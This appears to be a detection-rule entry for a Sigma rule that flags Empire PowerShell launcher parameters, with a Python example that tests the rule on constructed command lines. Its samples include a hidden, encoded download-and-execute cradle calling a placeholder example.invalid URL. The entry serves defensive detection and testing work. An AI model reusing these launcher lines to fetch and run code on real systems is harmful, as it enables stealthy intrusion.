Techniques
Sample rules
HackTool - Empire PowerShell Launch Parameters
- source: sigma
- techniques:
- t1059
- t1059.001
Description
Detects suspicious PowerShell command-line parameters used by Empire launchers
Detection logic
condition: selection
selection:
CommandLine|contains:
- ' -NoP -sta -NonI -W Hidden -Enc '
- ' -noP -sta -w 1 -enc '
- ' -NoP -NonI -W Hidden -enc '
- ' -noP -sta -w 1 -enc'
- ' -enc SQB'
- ' -nop -exec bypass -EncodedCommand '
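The selection above, run over constructed command lines, as an added example that is not part of the rule or of the Sigma project. Sigma string modifiers such as `contains` match case-insensitively by default, so the matcher lower-cases both sides; the sample command lines, the base64 helper and the hypothetical `example.invalid` download URL are constructed here for illustration, not real telemetry. The `-enc SQB` string works because `SQB` is the leading base64 of a UTF-16LE string that starts with `I` followed by another ASCII letter (for example `IEX` or `Invoke-`), which the example reproduces.

```python
import base64

# Selection strings copied from the rule above (CommandLine|contains).
EMPIRE_LAUNCH_PATTERNS = [
    " -NoP -sta -NonI -W Hidden -Enc ",
    " -noP -sta -w 1 -enc ",
    " -NoP -NonI -W Hidden -enc ",
    " -noP -sta -w 1 -enc",
    " -enc SQB",
    " -nop -exec bypass -EncodedCommand ",
]


def matches_empire_launch(command_line: str) -> bool:
    """Evaluate the rule's single selection (condition: selection).

    Sigma's |contains is case-insensitive by default, so both the event
    field and the patterns are lower-cased before the substring test.
    """
    cl = command_line.lower()
    return any(pattern.lower() in cl for pattern in EMPIRE_LAUNCH_PATTERNS)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64.

    Helper constructed for this example; it mirrors the encoding PowerShell
    performs, it is not taken from Empire or from the rule.
    """
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not real telemetry). The URL is a
# placeholder on the reserved .invalid TLD.
ENCODED_IEX = encode_powershell(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
)
SAMPLE_COMMAND_LINES = {
    # Classic Empire launcher shape: matches the first selection string.
    "empire_default": "powershell -NoP -sta -NonI -W Hidden -Enc " + ENCODED_IEX,
    # Same parameters with different casing: still matches, because the
    # Sigma match is case-insensitive.
    "empire_uppercased": "POWERSHELL -NOP -STA -W 1 -ENC " + ENCODED_IEX,
    # Only -enc plus an encoded command starting with "IEX": caught by
    # the ' -enc SQB' string alone.
    "encoded_iex_only": "powershell.exe -enc " + ENCODED_IEX,
    # Encoded but benign: the UTF-16LE base64 of "Get-Service" does not
    # start with SQB, so no selection string matches.
    "benign_encoded": "powershell.exe -enc " + encode_powershell("Get-Service spooler"),
    # Ordinary admin invocation with long-form parameters: no match.
    "benign_admin": (
        "powershell.exe -NoProfile -ExecutionPolicy Bypass "
        "-File C:\\scripts\\backup.ps1"
    ),
}


def evaluate_samples(samples=SAMPLE_COMMAND_LINES) -> dict:
    """Return {sample name: rule fired?} for each constructed command line."""
    return {name: matches_empire_launch(cl) for name, cl in samples.items()}


if __name__ == "__main__":
    for name, fired in evaluate_samples().items():
        print(f"{name:20s} {'ALERT' if fired else 'clean'}")
```

Two things the run shows that the rule text alone does not: a backend that compiles `contains` into a case-sensitive comparison would miss `empire_uppercased`, so check how your SIEM handles Sigma case-insensitivity; and the ` -enc SQB` string fires on any encoded command beginning with `I` plus a letter, so expect occasional hits from legitimate encoded `Import-Module` or `Invoke-Command` invocations and tune with a parent-process or signer filter rather than by dropping the string.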